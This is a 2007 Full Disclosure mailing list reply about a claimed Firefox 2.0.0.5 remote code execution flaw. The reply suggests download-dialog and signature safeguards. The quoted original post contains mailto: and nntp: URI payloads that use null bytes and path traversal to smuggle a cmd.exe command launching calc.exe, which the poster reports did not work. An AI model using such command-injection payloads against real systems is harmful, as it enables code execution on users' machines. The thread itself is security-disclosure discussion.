Full Disclosure mailing list archives
Re: FIREFOX 2.0.0.5 new vulnerability
From: wac <waldoalvarez00 () gmail com>
Date: Wed, 25 Jul 2007 12:18:22 -0400
Well I hope the next version won't open 45 internet explorers when I click the mailto URLs. And that when you download something you don't have the save button enabled by default (and with that delay to avoid return hits security things) It should have enabled by default the cancel button. Instead of everybody having to wait a century to get the save button activated. Is so broken that way. Ahh and to prevent clicks the dialog displayed somewhere away from the mouse pointer. Ahh and by default no having enabled the open with when you download but the save as (somebody can hit enter without noticing). Hey maybe configurable? And what about providing in the website some hash over SSL so you can verify that is was not modified on the fly when you download? I mean encrypting every download around is simply brain dead but a hash is OK. Hey what about a digital signature you could verify with a public key? Zero overload on servers ;) Regards Waldo Alvarez. On 7/25/07, Mesut EREN <meren () basakkiremit com tr> wrote:
Hi all, FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5. But don't work is code. Example code is mailto:%00%00../../../../../../windows/system32/cmd<%00%00../../../../../../windows/system32/cmd>".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat nntp:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat Where i missing? Mesut EREN BAŞAK ÇATI & CEPHE SİSTEMLERİ Bilgi İşlem Sorumlusu MCSA:S,MCSE:S,CEH,CCNA meren () basakkiremit com tr _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- FIREFOX 2.0.0.5 new vulnerability Mesut EREN (Jul 25)
- Re: FIREFOX 2.0.0.5 new vulnerability Valdis . Kletnieks (Jul 25)
- Re: FIREFOX 2.0.0.5 new vulnerability pdp (architect) (Jul 25)
- Re: FIREFOX 2.0.0.5 new vulnerability Nate McFeters (Jul 25)
- Re: FIREFOX 2.0.0.5 new vulnerability wac (Jul 25)
- Re: FIREFOX 2.0.0.5 new vulnerability Nate McFeters (Jul 25)
- Re: FIREFOX 2.0.0.5 new vulnerability wac (Jul 27)
- Re: FIREFOX 2.0.0.5 new vulnerability Nate McFeters (Jul 27)
- Re: FIREFOX 2.0.0.5 new vulnerability Joe Barr (Jul 28)
- Re: FIREFOX 2.0.0.5 new vulnerability Nate McFeters (Jul 25)